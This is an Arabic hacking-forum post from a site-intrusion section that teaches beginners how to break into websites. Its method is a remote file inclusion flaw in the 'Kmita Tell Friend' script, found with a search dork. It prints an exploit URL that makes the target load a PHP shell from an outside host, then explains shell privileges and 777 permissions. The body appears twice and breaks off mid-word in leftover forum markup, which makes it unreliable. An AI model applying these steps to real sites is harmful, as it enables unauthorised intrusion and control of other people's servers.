sir silveEer
New Member
خطوات الاختراق الصحيحه بعد اليوم راح تخترق علي كيفك
بسم الله الرحمن الرحيم
بعيدا عن المقدمات والكلام الكتير
كتير من المبتدأين يملوا بل ويفقدوا الامل في تعلم الهكر
يحثوا انو صعب
وذلك لعدم توفر الطريقه الصحيحيه لارشادهم الي الطريق المفيد
نترك اللغه لأهلها ونتكلم مع بعض كأنكـ قاعد أدامي
دلوقتي احنا عايزين نخترق موقع
كويس
نطير علي اي موقع يختص بالثغرات
وليكن الميل ورمـ
www.milw0rm.com
ونشوف لنا ثغرة ريموت فايل انكلود عشان سهله وتطبيقها سهل ومفيد
طيب واحد يسألني يعني ايه ريموت فايل انكلود
remote يعني تحكم
file يعني ملف
include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ
ادراج ملف للتحكم
طيب للتحكم في ايه
اقولك في الموقع اللي عايزين نخترقوا
طيب كويس
نجيب ثغرة نطبق عليها الكلامـ
Dork:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
ايه يا عم الكلام الكتير دا
موش فاهمين حاجه
واحده واحده كدا وقلنا
طيب انا معاكوا نفهمها واحده واحدها
دي ثغرة من نوع ريموت فايل انكلود
موجوده في سكريبت اسموا
" "allinurl:/kmitat/"
طيب الثغرة دي هنستغلها ازاي
اقولكـ نربطـ الثغرة بشيل عشان يقرالنا نلفات الموقع
طيب ايه هو الشيل
الشيل هو ملف مبرمج بلغة البي اتش بي
مرفوع علي استضافه مجانيه بلغة txt or jpg
طيب كويس وايه فايدة الشيل
بيقرالنا ملفات الموقع ومن خلالوا نقدر نتحكم بالموقع حسب صلاحيتنا
طيب ايه هيا الصلاحيات
الصلاحيات هي حالة المخترق بعد رفع الشيل
يعني الشيل هو اللي بيتحكم في نوع الصلاحيه
اما نوي بدي او يوزر او اباتشي او روت
واحد يقولي يعني بتختلف في نوع الشيل او طريقة رفعوا او اوا
اقولوا لا خالص
الاختلاف في صلاحيتك خسب حماية السيرفر
يعني لو السيرفر حمايتوا ه تلاقي صعوبه في الحصول علي اعلي الصلاحيات
طيب مين اللي بيتحكم بالصلاحيات
الروت او الادمنroot
طيب ايه فايدة معرفة الصلاحيه
عشان تعرف انت هتعمل ايه بالظبط
لان من صلاحيه لصلاحيه تفرق كتير
ممكن يكون ملف عله تصريح
777
رمزة علي الملفات : rwxrwxrwx
رمزة علي المجلدات : drwxrwxrwx
طيب أزاي نعرف ان التصريح دا 777
اقولك نحسبها سوي ونشوف هتيجي ولا لأ
اعلم أولا
r = 4
w = 2
x = 1
rwx rwx rwx "2"
طيب نبدل القيم الي فوق بما يساويها من ارقام
1+2+4=7
1+2+4=7
1+2+4=7
اذا
7 7 7
هو تصريحها
تقدر تعمل اللي انت عايزوا فيه
ممكن يكون مغلق التصريح
ما تقدر تفعل شئ
المهمـ نكمل
الثغرة اللي معانا
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
دوركـ البحث
اول ما تصمع كلمة دوركـ dork تعرف انواكود بحث
طيب نجي للاستغلال
يعني هنستغل البحث دا ازاي
ونعرف هل الموقع به الثغرة ولا لأ
اول ما تسمع كلمة اكسبلويت
أو
Example:
Expl:
Exploit:
Exploits:
Expl:
تعرف انها كود استغلال
http://www.xxx.com/kmitam/htmlcode.php?file=http://xxx.com/ txt?
'طيب نفسر اللي حصل ده
http://www.xxx.com عنوان الموقع
ممكن يكون مكتوب في الثغرة
[target]
[site]
[namesite]
kmitam الاسكريبت المصاب ممكن...r silveEer [/SIZE][/FONT][/CENTER]
بعيدا عن المقدمات والكلام الكتير
كتير من المبتدأين يملوا بل ويفقدوا الامل في تعلم الهكر
يحثوا انو صعب
وذلك لعدم توفر الطريقه الصحيحيه لارشادهم الي الطريق المفيد
نترك اللغه لأهلها ونتكلم مع بعض كأنكـ قاعد أدامي
دلوقتي احنا عايزين نخترق موقع
كويس
نطير علي اي موقع يختص بالثغرات
وليكن الميل ورمـ
www.milw0rm.com
ونشوف لنا ثغرة ريموت فايل انكلود عشان سهله وتطبيقها سهل ومفيد
طيب واحد يسألني يعني ايه ريموت فايل انكلود
remote يعني تحكم
file يعني ملف
include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ
ادراج ملف للتحكم
طيب للتحكم في ايه
اقولك في الموقع اللي عايزين نخترقوا
طيب كويس
نجيب ثغرة نطبق عليها الكلامـ
Dork:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
ايه يا عم الكلام الكتير دا
موش فاهمين حاجه
واحده واحده كدا وقلنا
طيب انا معاكوا نفهمها واحده واحدها
دي ثغرة من نوع ريموت فايل انكلود
موجوده في سكريبت اسموا
" "allinurl:/kmitat/"
طيب الثغرة دي هنستغلها ازاي
اقولكـ نربطـ الثغرة بشيل عشان يقرالنا نلفات الموقع
طيب ايه هو الشيل
الشيل هو ملف مبرمج بلغة البي اتش بي
مرفوع علي استضافه مجانيه بلغة txt or jpg
طيب كويس وايه فايدة الشيل
بيقرالنا ملفات الموقع ومن خلالوا نقدر نتحكم بالموقع حسب صلاحيتنا
طيب ايه هيا الصلاحيات
الصلاحيات هي حالة المخترق بعد رفع الشيل
يعني الشيل هو اللي بيتحكم في نوع الصلاحيه
اما نوي بدي او يوزر او اباتشي او روت
واحد يقولي يعني بتختلف في نوع الشيل او طريقة رفعوا او اوا
اقولوا لا خالص
الاختلاف في صلاحيتك خسب حماية السيرفر
يعني لو السيرفر حمايتوا ه تلاقي صعوبه في الحصول علي اعلي الصلاحيات
طيب مين اللي بيتحكم بالصلاحيات
الروت او الادمنroot
طيب ايه فايدة معرفة الصلاحيه
عشان تعرف انت هتعمل ايه بالظبط
لان من صلاحيه لصلاحيه تفرق كتير
ممكن يكون ملف عله تصريح
777
رمزة علي الملفات : rwxrwxrwx
رمزة علي المجلدات : drwxrwxrwx
طيب أزاي نعرف ان التصريح دا 777
اقولك نحسبها سوي ونشوف هتيجي ولا لأ
اعلم أولا
r = 4
w = 2
x = 1
rwx rwx rwx "2"
طيب نبدل القيم الي فوق بما يساويها من ارقام
1+2+4=7
1+2+4=7
1+2+4=7
اذا
7 7 7
هو تصريحها
تقدر تعمل اللي انت عايزوا فيه
ممكن يكون مغلق التصريح
ما تقدر تفعل شئ
المهمـ نكمل
الثغرة اللي معانا
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"
دوركـ البحث
اول ما تصمع كلمة دوركـ dork تعرف انواكود بحث
طيب نجي للاستغلال
يعني هنستغل البحث دا ازاي
ونعرف هل الموقع به الثغرة ولا لأ
اول ما تسمع كلمة اكسبلويت
أو
Example:
Expl:
Exploit:
Exploits:
Expl:
تعرف انها كود استغلال
http://www.xxx.com/kmitam/htmlcode.php?file=http://xxx.com/ txt?
'طيب نفسر اللي حصل ده
http://www.xxx.com عنوان الموقع
ممكن يكون مكتوب في الثغرة
[target]
[site]
[namesite]
kmitam الاسكريبت المصاب ممكن...r silveEer [/SIZE][/FONT][/CENTER]
التعديل الأخير:
اسم الموضوع : خطوات الاختراق الصحيحه بعد اليوم راح تخترق علي كيفك
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات